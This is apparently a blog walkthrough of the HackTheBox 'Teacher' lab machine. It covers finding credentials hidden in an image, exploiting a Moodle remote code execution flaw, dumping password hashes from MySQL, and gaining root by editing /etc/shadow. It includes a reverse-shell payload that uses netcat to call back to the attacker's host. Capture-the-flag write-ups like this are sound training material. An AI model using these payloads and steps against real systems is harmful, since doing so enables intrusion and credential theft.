HacktheBox Teacher Walkthrough

How to Hack an Android phone Beginner to Advance
April 19, 2019
HacktheBox Irked: Walkthrough
April 27, 2019
Share This:

HacktheBox Teacher Walkthrough

Nmap

Finding Creds:

Download Image and cat image revels username and password

Username : Giovanni Password : Th4C00lTheacha#

Gobuster

GoBuster Revels dir named “moodle”

Finding Exploit

login with creds

After Doing little research on moodle got this

https://blog.ripstech.com/2018/moodle-remote-code-execution/

Exploiting

Paste in End &0=(date;nc 10.10.14.106 5556 -e /bin/bash)

Now we Have Shell Lets Move on

Becoming User:

We Got Mysql Creds

Login

So Now we need to Find Creds For User

After Searching I got Giovanni password

Commands

use moodle;

show tables;

describe mdl_user;

select id,username,password from mdl_user;

Simply Google MD5 hash

Username : giovanni password : expelled

Becoming Root:

Now We Can Edit Shadow File Directly

Lets Change The root hash to user hash

Now we are root

Share This:

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: